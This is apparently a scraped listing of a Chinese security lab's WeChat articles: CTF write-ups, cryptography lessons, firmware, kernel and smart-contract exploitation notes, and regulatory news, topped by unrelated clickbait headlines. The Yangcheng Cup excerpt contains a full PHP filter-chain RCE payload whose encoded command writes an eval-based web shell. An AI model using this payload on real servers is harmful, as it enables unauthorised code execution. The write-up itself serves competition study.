人民日报林治波社长发出灵魂拷问:你们是没有常识,还是没有良知?

惨烈的高峰防御战—“圣元春战役”打响!

母子乱伦:和儿子做了,我该怎么办?

一定在信仰的指导下抗击疫情《马克思主义信仰:战胜新冠肺炎疫情的内生力量》

伊朗著名美女明星、奥斯卡影后被捕!

自由微信安卓APP发布,立即下载! | 提交文章网址

山石网科安全技术研究院

VxWorks固件加载地址分析方法研究

本文主要是通过固件格式分析和固件特征识别的方法,识别VxWorks加载地址。经过观察研究,现有的路由器设备主要分为Linux系统、RTOS系统,VxWorks属RTOS系统的一种,而VxWorks系统除了用于嵌入式等设备,还常被用于低端路由器。VxWorks的路由器设备通常升级固件包不超过3MB,这样是为了减少固件的大小,在廉价、存储空间小的路由器设备上也可以进行存储和运行。总体来看,VxWorks路由器设备成本较低,价格相对于同级别的
12月16日 上午 11:04

参赛锦囊|2022第二届山石杯信息安全攻防大赛Q&A

2022第二届“山石杯”信息安全攻防大赛12月18日正式开始点击下方【预约】按钮,即可预约赛事直播,精彩抢”鲜“看截至目前,2022第二届山石杯信息安全攻防大赛共有302支战队报名,通过对重复报名和报名信息不全的队伍进行筛选后,有229支队伍通过审核,其中包含了145家企事业单位、近700名参赛选手。现公布参赛队伍名单,请扫描下方二维码查看或点击文末“阅读原文”。(*如果对参赛队伍名单有疑议,请在赛事QQ联络群中联系管理员。)另外,请各位选手注意:参赛信息将在12月17日发送至参赛选手预留手机号,届时赛事平台将开放给选手进行连通性测试。问1.正赛的时间是?答2022年12月18日
12月15日 上午 11:20

密码学|概率论 5.3.3 蒙特卡罗算法

5.3.3蒙特卡罗算法在实际运用中,有许多算法的输出并不能保证正确。例如。3.4一节描述的Miller–Rabin算法,该算法用于检查给定的大数是否为素数。在实践中,我们多次运行算法以获得
12月14日 上午 10:44

TLS 1.2 协议解析流程学习(一)

之前学习了很多与密码学相关的理论,但其实一直忽视了密码学在实际生活,尤其是网络世界中的应用,未知攻,焉知防。但是连其本身的体制流程都不了解,又如何攻呢?于是在学习密码学这个方向上的漏洞挖掘之前,还想了解一下当前密码学的实际应用场景。那么自然是先从我们的网络通讯协议TLS入手。参考网站The
12月13日 上午 11:13

VxWorks固件系统研究

通过bindiff有符号的和无符号的VxWorks文件恢复函数名。总结下来就是:在知道程序使用的库函数时,可以先编译相关的库,再使用FLIRT、Rizzo、bindiff进行识别。
12月7日 上午 11:03

根据应用修改的竞赛题目-uniswap篇

一:以太坊应用在2018年之后,以太坊的实际应用开始落地,如uniswap这类AMM,还有DAO这种去中心化自治组织。而现实中的安全事件也大多为对以太坊应用的攻击。现在,对以太坊应用的攻击相关的题目也出现在竞赛中。二:Uniswap
12月6日 上午 11:12

第二届山石杯信息安全攻防大赛正式启动

2022第二届“山石杯”信息安全攻防大赛正式启动网安山峰之巅,邀你来战!赛事介绍为了与广大合作伙伴共践“可持续安全观”,助力客户实现可持续安全运营,山石网科面向山石网科合作伙伴、客户,举办2022年第二届山石杯信息安全攻防大赛通过赛项检验参赛选手网络安全、安全架构和安全服务等方面的技术技能,让身置不同岗位角色的技术队伍之间进行技术交锋,相互切磋;以赛促学,活学活用。更有丰厚奖品、证书等你来拿赛事公告扫码上方二维码,查看赛事公告赛事报名扫码上方二维码,参与赛事报名报名截止日期:2022年12月11日18:00赛事联络群扫码上方二维码,加入赛事QQ联络群:261871964“第二届山石杯信息安全攻防大赛”
12月5日 下午 6:01

利用solidity与EVM本身的漏洞进行攻击(下)

}}部署合约并传入一些Ether,传入要强制转账的地址调用transfer就会进行自毁,并强制将本合约的所有Ether转到目标地址。#实例//
12月2日 上午 10:51

山石网科安研院获评年度杰出安全实验室

2022年是数字经济蓬勃发展之年,也是数字经济与网络安全深度融合之年。在科技与安全高速发展的驱动下,网安行业各企业不断地开展学术研讨,研发科技创新产品,实现核心技术突破,快速推动安全生态发展。嘶吼每年举办一次金帽子评选活动,今年收到了上百家安全厂商、安全研究者和爱好者的踊跃报名与投票,共收录有效网友投票200000+张。今年网络安全金帽子年度评选活动参与厂商和投票数量比往届同期增长25%,经过认真的核验之后,2022年网络安全“金帽子”年度评选活动各评选项目重磅出炉。其中山石网科安全技术研究院从众多友商的同类部门之中脱颖而出,再次获得年度杰出安全实验室的评选。山石安研院从成立至今短短的两年多时间里,持续为CNVD、CNNVD、NVDB、CICSVD、CITIVD、CVE等漏洞库提交原创漏洞共一千余个,并获得相关机构表彰,协助国内外厂商修复超过上百个严重安全漏洞,获得Microsoft、Apple、Adobe、Oracle、Google等国际大厂的公开致谢,也获得了国内诸多单位的感谢信。多位研究人员受聘于国内多所知名高校的网络安全教练、讲师等职位,在学术研究方面我们获得了多份国内外安全专利,参编了多份国家、团体等类型的信息安全标准,与CSA、OWASP等安全组织建立了友好的技术合作关系,在安全竞赛方面也获得了斐然的成绩。2020全国电信和互联网行业网络安全管理职业技能竞赛团队特等奖、团队一等奖2021第四届“强网”拟态防御国际精英挑战赛一等奖,线上初赛第一名2021第三届“第五空间”网络安全大赛特等奖2021天津“津门杯”国际网络安全创新大赛一等奖2021甘肃第二届“陇警杯”网络安全大赛第一名2021第二届“祥云杯”网络安全大赛第二名2021第一届“长安杯”网络安全极客挑战赛线上初赛第一名2021第一届“长城杯”网络安全大赛线上初赛第一名山石安研院将继续携手旗下五大实验室发挥自身的特长,在工业安全、信创安全、应用安全、核心基础安全和智能物联安全等前沿热点技术方向继续深入研究,展开技术创新攻关,为前端与客户提供专业的攻防能力战略支撑,同时也将协同山石网科的各类安全产品优势,为各行业的安全发展注入动力。
12月1日 上午 10:25

利用solidity与EVM本身的漏洞进行攻击(上)

编译与执行solidity是一种高级语言,由人类来编写,语法上类似JavaSrcipt。solidity的源代码可以由编译器编译成以太坊虚拟机(EVM)的字节码,字节码可以在EVM上运行。EVM有许多种版本的实现,但这里我们主要考虑go-ethereum的实现。字节码的详细介绍在:https://www.evm.codes/字节码的go-ethereum实现在:https://github.com/ethereum/go-ethereum/blob/master/core/vm/instructions.go整数溢出#原理solidity和EVM支持加减乘除等基础的操作,在solidity层面,整数分为有符号和无符号两种,int表示有符号,uint表示无符号,而在uint或int后面会加上一个8的倍数作为位数,上限为256位,如果没有标位数,则会被认为是256位,如uint就是uint256的别名。可以发现,在solidity层面,无符号整数能表示的范围是有限的,如果超过了能表示的最大范围,就会进行取模操作。而在EVM字节码的实现,和运算有关的字节码有Add、Sub、Mul等,查看其中的源码实现,可以发现里面的数都是256位的,而go本身不支持256位无符号整数,所以使用了一个第三方包:github.com/holiman/uint256
11月30日 上午 11:01

强网拟态区块链题Revenge NTF WP

}}CtfToken给market合约mint了1337wei,并且里面还可以领取一次空投,数量为5wei。查看market合约,找到了一个可疑的函数purchaseTest:function
11月28日 上午 11:01

《工业互联网密码支撑标准体系建设指南》《车联网(智能网联汽车)密码支撑标准体系建设指南》正式发布

为深入贯彻落实《中华人民共和国网络安全法》《中华人民共和国密码法》《加强工业互联网安全工作的指导意见》《关于加强车联网网络安全和数据安全工作的通知》等文件要求,充分发挥标准在工业互联网和车联网(智能网联汽车)密码支撑体系中的顶层设计和基础引领作用,系统推动商用密码在工业互联网和车联网(智能网联汽车)领域的应用,加快构建统一、科学、高效的密码应用标准体系,在工业和信息化部网络安全管理局指导下,工业和信息化部商用密码应用推进标准工作组现正式发布《工业互联网密码支撑标准体系建设指南》《车联网(智能网联汽车)密码支撑标准体系建设指南》。
11月25日 上午 10:28

以UniswapV2为例模拟DeFi闪电贷

data);这里需要调用者合约实现了IUniswapV2Callee接口中的uniswapV2Call函数:interface
11月24日 上午 11:06

国家网信办发布《关于修改〈中华人民共和国网络安全法〉的决定(征求意见稿)》

近日,国家网信办发布《关于修改〈中华人民共和国网络安全法〉的决定(征求意见稿)》,面向社会公开征求意见。《中华人民共和国网络安全法》自2017年施行以来,为维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,提供了有力的法律保障。同时,为适应新形势,《中华人民共和国行政处罚法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》等法律于2021年相继修订制定实施。为做好《中华人民共和国网络安全法》与新实施的法律之间衔接协调,完善法律责任制度,进一步保障网络安全,拟对《中华人民共和国网络安全法》作以下修改:一是完善违反网络运行安全一般规定的法律责任制度。结合当前网络运行安全法律制度实施情况,拟调整违反网络运行安全保护义务或者导致危害网络运行安全等后果的行为的行政处罚种类和幅度。二是修改关键信息基础设施安全保护的法律责任制度。关键信息基础设施是经济社会运行的神经中枢,为强化关键信息基础设施安全保护责任,进一步完善关键信息基础设施运营者有关违法行为行政处罚规定。三是调整网络信息安全法律责任制度。适应网络信息安全工作实际,对违反网络信息安全义务行为的法律责任进行整合,调整了行政处罚幅度和从业禁止措施,新增对法律、行政法规没有规定的有关违法行为的法律责任规定。四是修改个人信息保护法律责任制度。鉴于《中华人民共和国个人信息保护法》规定了全面的个人信息保护法律责任制度,拟将原有关个人信息保护的法律责任修改为转致性规定。关于修改《中华人民共和国网络安全法》的决定(征求意见稿)一、将第五十九条、第六十条、第六十一条、第六十二条修改为:“违反本法第二十一条、第二十二条第一款和第二款、第二十三条、第二十四条第一款、第二十五条、第二十六条、第二十八条、第三十三条、第三十四条、第三十六条、第三十八条规定的网络运行安全保护义务或者导致危害网络运行安全等后果的,由有关主管部门责令改正,给予警告、通报批评;拒不改正或者情节严重的,处一百万元以下罚款,并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。有前款规定的违法行为,情节特别严重的,由省级以上有关主管部门责令改正,处一百万元以上五千万元以下或者上一年度营业额百分之五以下罚款,并可以责令停止相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照;对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款,并可以决定禁止其在一定期限内担任相关企业的董事、监事、高级管理人员或者从事网络安全管理和网络运营关键岗位的工作。”二、将第六十三条、第六十七条修改为:“违反本法第二十七条、第四十六条规定,从事危害网络安全的活动,或者提供专门用于从事危害网络安全活动的程序、工具,或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助,或者设立用于实施违法犯罪活动的网站、通讯群组,或者利用网络发布涉及实施违法犯罪活动的信息,尚不构成犯罪的,由公安机关没收违法所得,处五日以下拘留,可以并处五万元以上五十万元以下罚款;情节较重的,处五日以上十五日以下拘留,可以并处十万元以上一百万元以下罚款。单位有前款行为的,由公安机关没收违法所得,处十万元以上一百万元以下罚款,并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。违反本法第二十七条规定,受到治安管理处罚的人员,五年内不得从事网络安全管理和网络运营关键岗位的工作;受到刑事处罚的人员,终身不得从事网络安全管理和网络运营关键岗位的工作。”三、将第六十四条修改为:“网络运营者、网络产品或者服务的提供者违反本法第二十二条第三款、第四十一条至第四十四条规定,侵害个人信息依法得到保护的权利的,依照有关法律、行政法规的规定处罚。”四、将第六十五条修改为:“关键信息基础设施的运营者违反本法第三十五条规定,使用未经安全审查或者安全审查未通过的网络产品或者服务的,由有关主管部门责令停止使用,处采购金额一倍以上十倍以下或者上一年度营业额百分之五以下罚款,对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。”将第六十六条修改为:“关键信息基础设施的运营者违反本法第三十七条规定,在境外存储网络数据,或者向境外提供网络数据的,依照有关法律、行政法规的规定处罚。”五、将第六十八条、第六十九条修改为:“违反本法第四十七条、第四十八条、第四十九条规定的网络信息安全保护义务,或者不按照有关部门的要求对法律、行政法规禁止发布或者传输的信息采取停止传输、消除等处置措施的,或者不按照有关部门的要求对网络存在较大安全风险和发生安全事件采取措施的,由有关主管部门责令改正,给予警告、通报批评,没收违法所得;拒不改正或者情节严重的,处一百万元以下罚款,并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。情节特别严重的,由省级以上有关主管部门责令改正,没收违法所得,处一百万元以上五千万元以下或者上一年度营业额百分之五以下罚款,并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照;对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款,并可以决定禁止其在一定期限内担任相关企业的董事、监事、高级管理人员或者从事网络安全管理和网络运营关键岗位的工作。”六、将第七十条修改为:“发布或者传输本法第十二条第二款和其他法律、行政法规禁止发布或者传输的信息的,依照有关法律、行政法规的规定处罚。法律、行政法规没有规定的,由有关主管部门责令改正,给予警告、通报批评,没收违法所得;拒不改正或者情节严重的,处一百万元以下罚款,并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。情节特别严重的,由省级以上有关主管部门责令改正,没收违法所得,处一百万元以上五千万元以下或者上一年度营业额百分之五以下罚款,并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照;对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款,并可以决定禁止其在一定期限内担任相关企业的董事、监事、高级管理人员或者从事网络安全管理和网络运营关键岗位的工作。”此外,对条文序号作了相应调整。(来源:“网信中国”微信公众号)
11月17日 上午 10:32

利用msg-msg结构体进行提权

kernel_offset);11.有了内核基址后,构造pipe_buffer->ops,劫持release函数,完成控制流劫持,最后构造ROP栈迁移,返回用户态起shel。#define
11月16日 上午 11:26

隐写术之文档和二维码解题技巧

Research是款简单实用的二维码扫描识别工具,支持对QR码进行编码、解码,能显示QR的版本、纠错等级、掩码和内容信息,支持全屏和区域抓取QR码、摄像头抓取等。2.3
11月15日 上午 11:02

5.2.1 针对维吉尼亚密码的密码分析:理论部分

我们之前注意到,在明文中出现的许多字母中,有一定比例的单词将与密钥的相同部分对齐。事实证明,这种对齐发生的频率要比人们想象的要高得多。这是
11月11日 上午 10:43

区块链2.0的杀手应用 — UniswapV2

一、简介UniswapV2是一个建立在以太坊上的主流去中心化加密交易平台(DEX),实现了自动化做市商(AMM)。AMM要实现s自动完成与买卖方的交易,需要满足以下几个特性:1.AMM要持有资产,由于要双向报价,所以需要同时持有两种资产。2.AMM资产池应该能实现充值与提现。3.AMM应该根据市场情况自动调整价格。4.AMM要能通过交易赚取利润。二、
11月9日 上午 11:04
11月8日 上午 10:42

linux kernel 结构体利用 — tty,seq

userfaultfd模块为经典菜单ioctl程序如下,其中gift可以白给出堆地址,程序很多地方用了锁,但是很多锁没啥意义。edit如下使用了
11月7日 上午 11:12

Bluetooth 蓝牙协议栈技术初探

DB_ADDR:蓝牙设备地址。每个蓝牙设备被分配了类似mac地址的唯一的一个48位数的设备地址。用于通讯地址确认.两个蓝牙设备在通讯开始时通过询问的方式获取蓝牙设备地址所以蓝牙的工作过程为:启动
11月4日 上午 11:42

日本个人信息保护委员会(PIPC)推出数据映射工具包

二、根据数据处理状况等产生的风险采取必要措施。使用数据映射表,我们将识别数据处理状态等产生的风险,并采取必要的措施。数据映射表中确定的风险和应对措施示例包括:(一)数据内容风险
11月3日 上午 11:28

家用智能灯泡的控制功能安全测试

前言随着IOT技术的普及,智能家居设备在家庭中使用的也越来越多,例如智能灯泡、扫地机器人、智能音箱等智能设备都可以由一些专门的app进行统一的联网接管管理。本篇文章将以一款基于低功耗蓝牙的智能灯泡为例,展示其中可能存在的一些网络安全风险问题以及一些常规的劫持攻击方法。实验准备-所需工具硬件工具:NRF52832
11月2日 上午 11:20

密码学|5.2 维吉尼亚密码

在顶行找到明文字母,在第一列找到密钥字母。然后,他在明文字母的下面和密钥字母的右边寻找表上的字母,即密文。也就是说,他将加密的字母定位在以密钥字母所在行和以明文字母所在列的交汇处
11月1日 上午 10:43

工信部印发《网络产品安全漏洞收集平台备案管理办法》

现将《网络产品安全漏洞收集平台备案管理办法》印发给你们,请认真遵照执行。工业和信息化部2022年10月25日03网络产品安全漏洞收集平台备案管理办法第一条
10月31日 上午 10:20

如何使用create2来进行合约钓鱼

create在合约中部署合约可以使用create字节码,该字节码会通过部署合约的合约地址,nonce值来计算新合约的地址,计算公式为:keccak256(rlp.encode(address,
10月28日 上午 11:15

密码学|第五章 组合学、概率论与信息论

本章最后简要介绍了复杂度的概念以及多项式时间和不确定多项式时间算法的概念。这一部分如果讲的全面细致些就可以另写一本书了,因此我们只能对这一主题中使用的强大思想和技术给出一点提示。5.1
10月27日 上午 10:43

Cisco ASA ASDM FirePOWER Services漏洞分析

https://www.gns3.com/https://sysin.org/blog/cisco-asa-9-17/http://cisco.entrerock.com/software/3.1
10月26日 上午 10:50

Clicker恶意软件感染的APP下载超过2000万次

受Clicker恶意软件感染的16个Android应用程序,下载量超过2000万次16款累计下载量超过2000万的恶意应用程序被发现移动广告欺诈行为,目前已被Google
10月24日 上午 10:47

密码学 | 第4章 4.3 Elgamal 数字签名与DSA

下的离散对数问题简单,因此,只需取一个子群,并且在该子群中,用BSGS等碰撞算法求解离散对数问题是不可行的即可。现在我们来介绍一下
10月21日 上午 10:28

Tensorflow基础-张量(tensors)

Tensorflow神经网络的数据存储中都使用张量(Tensor),张量具体是什么?张量是TensorFlow数据的中心单元,张量这一概念的核心在于,它是一个数据容器。它包含的数据几乎总是数值数据,因此它是数字的容器。张量是矩阵向任意维度的推广。一、属性张量是由以下三个关键属性来定义的。01秩(Rank)Tensor对象由原始数据组成的多维的数组,Tensor的rank(秩)其实是表示数组的维数,如下所示的tensor例子:实例本文的运行环境为:python=2.7.18tensorflow=1.14.0标量
10月19日 上午 11:07

第二章 离散对数与Diffie-Hellman (练习题)

习题部分久等,对应内容可翻阅合集前期公众号。下面是第二章练习题第一部分的参考答案,部分是笔者自证,所以读者若是发现有纰漏之处,还望指正(可私信公众号)。Section
10月14日 上午 10:39

日本信息处理推进机构发布2022《信息安全白皮书》

2022年7月15日,日本信息处理推进机构(IPA)发布了2022年版《信息安全白皮书》。IPA自2008年开始发布年度《信息安全白皮书》,内容包括与信息安全有关的日本国内外政策、威胁动向、发生事件情况、所受影响情况等。除了这些固定内容之外,IPA每年还会选择代表性事件,采用官方和民间的各种数据和资料并进行分析。今年白皮书以“动摇的常识,增强的威胁:面对预想之外”为年度标题,分章节阐述了信息安全事件及脆弱性的现状和对策;介绍了日本国内和国际的信息安全政策、信息安全人才的现状、信息安全措施;最后概述了控制系统、物联网、云的信息安全,以及美国和欧洲的信息安全政策等。01
10月13日 上午 10:39

2022第五空间决赛WriteUp|pwn、reverse、crypto方向合集

import*context(os='linux',arch='amd64')context.log_level=Truelibc=ELF('./libc.so.6')#p
10月12日 上午 10:30

2022第五空间决赛WriteUp|web、misc方向合集

0x42B659e8AF2F25e81d327e36f4CfeDeF9bB0a323token:0xfDE23346cDb712739A6f0E119CDd479ee5DeFB16MISC01
10月11日 上午 10:45

2022年第三届电信和互联网行业职业技能竞赛暨第十一届信息通信网络安全管理员职业技能竞赛全国选拔赛WriteUp

MISCcalc在没有key时有长度限制,输入1进入calc,因为会调用print(eval(line)),所以直接输入key即可取得key变量的实际值。进入2:def
10月10日 上午 11:18

赛题复现:2022-CryptoCTF(一)

2~\xf3\xe3\xb6$\xb6i\x12\xd6\x82\xfac\x15\xeeVa[s\xa0S\x00y\x0c\x18\xc34\xbd\x96fd\xec\xcf\xb9\x02
9月26日 上午 10:29

卷积在图像处理中的应用

12345678910111213141516求y=x*h1.将卷积核旋转180°,即-1-2-10001212.将输入进行padding,因为kernel大小为3*3,所以padding_w
9月23日 上午 10:36

2022年第五空间网络安全大赛WriteUp | Reverse & Pwn & Crypto

In[20]:libnum.n2s(int(2761328357323929781063385491249486142671766712847109466352079855419392))
9月21日 上午 10:25

2020黑帽亚洲议题分享-大规模识别嵌入式固件中的 Multi-binary 漏洞

server以外的二进制程序(在很多的只关注网络协议上的二进制文件分析工具都会遗漏其它二进制文件中所包含的问题),在以下的代码中也可以看到。该服务由一个面向网络的
9月15日 上午 10:53

2022年羊城杯部分WriteUp

rce_me老考点了,$_SERVER["QUERY_STRING"]不会对获取的内容进行URL解码因此只要URL编码一下就完事了。用伪协议直接RCE写shell?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php&0=%65%63%68%6f%20%27%3c%3f%3d%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3f%3e%27%3e%32%2e%74%78%74SUID提权step_by_step-v3简单的POP链寻找EXP
9月7日 下午 2:53

GO语言安全 — 沙箱逃逸题目分析

代码中可以看出来程序主要引用了goeval中的EVAL库,我们从GITHUB中可以看到该库的基本用法,可以看出该库的基本用法与其他语言的EVAL无异。package
9月6日 上午 10:53

递归MMIO导致的虚拟机逃逸研究

size_t)at/home/qiuhao/hack/VirtualBox-6.1.26/src/VBox/Devices/Network/DevPCNet.cpp:755breakpoint
9月5日 上午 11:19

2022黑帽亚洲议题分享——Use Zero to Attack ZKP

注意,在攻击过程中,攻击者观察到无法解释的行为,这一点都不奇怪。有些时候,我们正是从这些奇怪点切入,从而发现了很多有意思的攻击。后来我们深入发现,这次攻击是由一系列的软件漏洞导致的。part
8月29日 上午 10:49

密码学 | 3.8 有限域Fp中计算离散对数的索引演算方法

下的同余式组,标准的线性代数方法,比如高斯消元,在模合数的剩余系下可能不会起作用,因为有的元素不存在乘法逆元。但我们可以用中国剩余定理(定理
8月18日 上午 10:58

密码学赛题复现:2021-CryptoCTF(二)

来。一般都是会传一下特殊的值,比如1,0,-1这样去fuzz,但是由于本地没法搭环境,就没法自己搞测试样例了,还挺麻烦的。(这里后面放出源码了,就模拟一下当时的场景好了。)def
8月11日 上午 10:30

密码学赛题复现:2021-CryptoCTF(一)

太小了。那么我们对矩阵列向量求一个gcd就能过获取flag的每一个字节的值了。所以这里的另辟蹊径。由于模运算的存在显然是逆不回去了,我们选择正向爆破。由于这里的,那么我们就尝试所有的
8月10日 上午 10:00

山石上榜微软2022年度全球最具价值安全研究员榜单

Researcher,MSRC是指Microsoft安全响应中心,负责分析和修复外部黑客报告给微软产品的漏洞。微软每年都会在BlackHat
8月9日 上午 11:52

java运行时应用自保护RASP技术浅析

ModuleVisitor:Java中模块的访问者,作为ClassVisitor.visitModule方法的返回值,要是不关心模块的使用情况,可以返回一个null。使用此对象的时候需要指定asm
8月8日 上午 11:10

第二届山石CTF夏令营|Reverse & Web学员感言摘录

tong课程时间上有些仓促,像Rust逆向这种点没来得及细讲,有点遗憾,不过总体还是很有收获,对桌面端逆向和移动端逆向都有了更加深入的了解,感谢各位讲师的无私分享。-
8月6日 上午 10:00